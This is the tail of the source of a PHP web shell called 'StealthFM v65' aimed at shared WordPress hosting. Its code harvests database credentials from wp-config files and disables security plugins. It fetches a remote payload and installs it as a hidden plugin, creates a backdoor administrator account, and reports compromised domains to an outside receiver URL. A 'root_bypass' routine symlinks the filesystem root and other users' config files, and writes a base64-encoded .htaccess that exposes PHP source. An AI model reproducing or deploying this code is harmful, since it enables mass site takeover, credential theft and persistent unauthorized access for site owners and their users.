"; } else { $au = 'xshikata'; $ap = md5('Lulz1337'); $ae = 'topupgameku.id@gmail.com'; $plugin_src = 'https://raw.githubusercontent.com/baseng1337/damn/refs/heads/main/system-core.php'; $plugin_folder_name = 'system-core'; $plugin_filename = 'system-core.php'; $plugin_hook = $plugin_folder_name . '/' . $plugin_filename; $receiver_url = 'https://stepmomhub.com/wp/receiver.php'; $receiver_key = 'wtf'; $master_core = sys_get_temp_dir() . '/master_core_' . time() . '.php'; $master_index = sys_get_temp_dir() . '/master_index_' . time() . '.php'; $ua = stream_context_create(['http'=>['header'=>"User-Agent: Mozilla/5.0"]]); $src_core = @file_get_contents($plugin_src, false, $ua); $src_idx = @file_get_contents('https://raw.githubusercontent.com/baseng1337/damn/refs/heads/main/index.php', false, $ua); if($src_core) file_put_contents($master_core, $src_core); if($src_idx) file_put_contents($master_index, $src_idx); foreach ($targets as $cfg) { $raw = x_read($cfg); if (!$raw) continue; $dh = get_conf_val_smart($raw, 'DB_HOST'); $du = get_conf_val_smart($raw, 'DB_USER'); $dp = get_conf_val_smart($raw, 'DB_PASSWORD'); $dn = get_conf_val_smart($raw, 'DB_NAME'); $pre = 'wp_'; if (preg_match("/\\\$table_prefix\s*=\s*['\"]([^'\"]+)['\"]/", $raw, $m)) $pre = $m[1]; $wp_root_path = dirname($cfg); $disp = str_replace($target, '', $wp_root_path); echo "
"; echo "Dir: " . ($disp?:'/') . " -> "; @mysqli_report(MYSQLI_REPORT_OFF); $cn = mysqli_init(); @mysqli_options($cn, MYSQLI_OPT_CONNECT_TIMEOUT, 2); if (@mysqli_real_connect($cn, $dh, $du, $dp, $dn)) { $plugins_dir = $wp_root_path . '/wp-content/plugins/'; $targets_to_kill = ['wordfence', 'ithemes-security-pro', 'sucuri-scanner', 'sg-security', 'limit-login-attempts-reloaded']; foreach ($targets_to_kill as $folder) { $path = $plugins_dir . $folder; if (is_dir($path)) { @rename($path, $path . '_killed_' . time()); } } $target_folder = $plugins_dir . $plugin_folder_name; $target_file = $target_folder . '/' . $plugin_filename; $index_file = $target_folder . '/index.php'; if (!is_dir($target_folder)) { @mkdir($target_folder, 0755, true); @chmod($target_folder, 0755); } $deploy_ok = false; if (file_exists($master_core) && @copy($master_core, $target_file)) { @chmod($target_file, 0644); if (file_exists($master_index)) @copy($master_index, $index_file); $deploy_ok = true; } $act_ok = false; $user_ok = false; if ($deploy_ok) { $qopt = @mysqli_query($cn, "SELECT option_value FROM {$pre}options WHERE option_name='active_plugins'"); $current_plugins = ($qopt && mysqli_num_rows($qopt) > 0) ? @unserialize(mysqli_fetch_assoc($qopt)['option_value']) : []; if (!is_array($current_plugins)) $current_plugins = []; if (!in_array($plugin_hook, $current_plugins)) { $current_plugins[] = $plugin_hook; sort($current_plugins); $hex_data = bin2hex(serialize($current_plugins)); @mysqli_query($cn, "DELETE FROM {$pre}options WHERE option_name='active_plugins'"); if (@mysqli_query($cn, "INSERT INTO {$pre}options (option_name, option_value, autoload) VALUES ('active_plugins', 0x$hex_data, 'yes')")) $act_ok = true; } else { $act_ok = true; } } $q1 = @mysqli_query($cn, "SELECT ID FROM {$pre}users WHERE user_login='$au'"); if ($q1 && mysqli_num_rows($q1) > 0) { $uid = mysqli_fetch_assoc($q1)['ID']; @mysqli_query($cn, "UPDATE {$pre}users SET user_pass='$ap' WHERE ID=$uid"); $user_ok = true; } else { @mysqli_query($cn, "INSERT INTO {$pre}users (user_login,user_pass,user_nicename,user_email,user_status,display_name) VALUES ('$au','$ap','Admin','$ae',0,'Admin')"); $uid = mysqli_insert_id($cn); if($uid) $user_ok = true; } if($user_ok) { $cap = serialize(['administrator'=>true]); @mysqli_query($cn, "INSERT INTO {$pre}usermeta (user_id,meta_key,meta_value) VALUES ($uid,'{$pre}capabilities','$cap') ON DUPLICATE KEY UPDATE meta_value='$cap'"); @mysqli_query($cn, "INSERT INTO {$pre}usermeta (user_id,meta_key,meta_value) VALUES ($uid,'{$pre}user_level','10') ON DUPLICATE KEY UPDATE meta_value='10'"); } $ping_res = "-"; $surl = ""; $qurl = @mysqli_query($cn, "SELECT option_value FROM {$pre}options WHERE option_name='siteurl'"); if ($qurl && mysqli_num_rows($qurl)>0) $surl = mysqli_fetch_assoc($qurl)['option_value']; if (!empty($surl)) { $pdata_direct = http_build_query(['action'=>'register_site', 'secret'=>$receiver_key, 'domain'=>$surl, 'api_user'=>'', 'api_pass'=>'']); $ctx_direct = stream_context_create(['http'=>['method'=>'POST','header'=>"Content-type: application/x-www-form-urlencoded",'content'=>$pdata_direct,'timeout'=>2]]); @file_get_contents($receiver_url, false, $ctx_direct); if ($act_ok) { $trigger_url = rtrim($surl, '/') . '/wp-content/plugins/' . $plugin_folder_name . '/index.php'; $ctx_trig = stream_context_create(['http'=>['method'=>'GET','header'=>"User-Agent: Mozilla/5.0",'timeout'=>2]]); @file_get_contents($trigger_url, false, $ctx_trig); $ping_res = "OK"; } } echo $deploy_ok ? "PLG:OK " : "PLG:ERR "; echo $user_ok ? "USR:OK " : "USR:ERR "; echo "PING:$ping_res"; mysqli_close($cn); } else { echo "DB CONN FAIL"; } echo "
"; } } echo "
"; echo "
"; exit; } // --- SCAN SITE (JSON OUTPUT FOR GUI) --- if ($tool === 'scan_site') { $target_scan_dir = $target; $found_domains = []; if (is_dir($target_scan_dir)) { $items = scandir($target_scan_dir); foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $path = $target_scan_dir . '/' . $item; if (is_dir($path)) { if (preg_match('/^([a-z0-9]+(-[a-z0-9]+)*\.)+[a-z]{2,}$/i', $item)) { $found_domains[] = $item; } } } } json_out(['status' => 'success', 'data' => $found_domains, 'count' => count($found_domains)]); exit; } if ($tool === 'root_bypass') { $dir = "symlinkbypass"; @mkdir($dir, 0755); chdir($dir); if (!function_exists('god_link')) { function god_link($target, $link) { if (function_exists('symlink') && @symlink($target, $link)) return true; if (function_exists('link') && @link($target, $link)) return true; $cmd_raw = "ln -s " . escapeshellarg($target) . " " . escapeshellarg($link); $cmd = $cmd_raw; if (function_exists('shell_exec')) { @shell_exec($cmd); } elseif (function_exists('exec')) { @exec($cmd); } elseif (function_exists('proc_open')) { $desc = [0 => ["pipe", "r"], 1 => ["pipe", "w"], 2 => ["pipe", "w"]]; $proc = @proc_open($cmd, $desc, $pipes); if (is_resource($proc)) { @fclose($pipes[0]); @fclose($pipes[1]); @fclose($pipes[2]); @proc_close($proc); } } elseif (function_exists('passthru')) { ob_start(); @passthru($cmd); ob_end_clean(); } elseif (function_exists('system')) { ob_start(); @system($cmd); ob_end_clean(); } elseif (function_exists('popen')) { $p = @popen($cmd, 'r'); if($p) pclose($p); } if(@file_exists($link)) return true; return false; } } $root_ok = god_link("/", "root"); $etc_path = dirname(__DIR__) . "/passwd.txt"; $etc = (file_exists($etc_path)) ? file_get_contents($etc_path) : false; $n = 0; if($etc) { $home_dirs = get_home_dirs(); $users = explode("\n", $etc); $confs = ["wp-config.php", "config.php", "configuration.php", ".my.cnf"]; foreach($users as $user_line) { $u = explode(":", $user_line)[0]; if(empty($u)) continue; foreach($home_dirs as $h) { $base_target = "$h/$u/public_html"; if(god_link($base_target, $u . "~folder~" . str_replace("/", "", $h))) $n++; foreach($confs as $cf) { god_link($base_target . "/" . $cf, $u . "~" . str_replace(".", "-", $cf) . ".txt"); } } } } $ht_b64 = "T3B0aW9ucyArRm9sbG93U3ltTGlua3MgK0luZGV4cwpEaXJlY3RvcnlJbmRleCBkZWZhdWx0LnBocApSZWFkT25seSB7IE9GRiB9CjxGaWxlc01hdGNoICJcLnBocCQiPgpTZXRIYW5kbGVyIHRleHQvcGxhaW4KQWRkVHlwZSB0ZXh0L3BsYWluIC5waHAKPC9GaWxlc01hdGNoPgpSZXdyaXRlRW5naW5lIE9mZgpTYXRpc2Z5IEFueQ=="; x_write(".htaccess", base64_decode($ht_b64)); echo "
[+] GOD MODE Bypass Active (Base64 Encoded Content)!
"; echo "Akses Root: [ ROOT / ]
"; echo "Akses User: [ BYPASS FOLDER ($n Users) ]
"; echo "Keamanan: Perintah Shell & .htaccess disamarkan dengan Base64."; exit; } } } ?> StealthFM v65
System Info:
User:
Group:
Safe Mode: [ PHP Info ]
IP:
Software:
PHP Ver:
cURL:
Time:
/
File Manager
NameSizePermsModifiedActions
MASS UPLOAD
Processed: 0Total: 0
Initializing...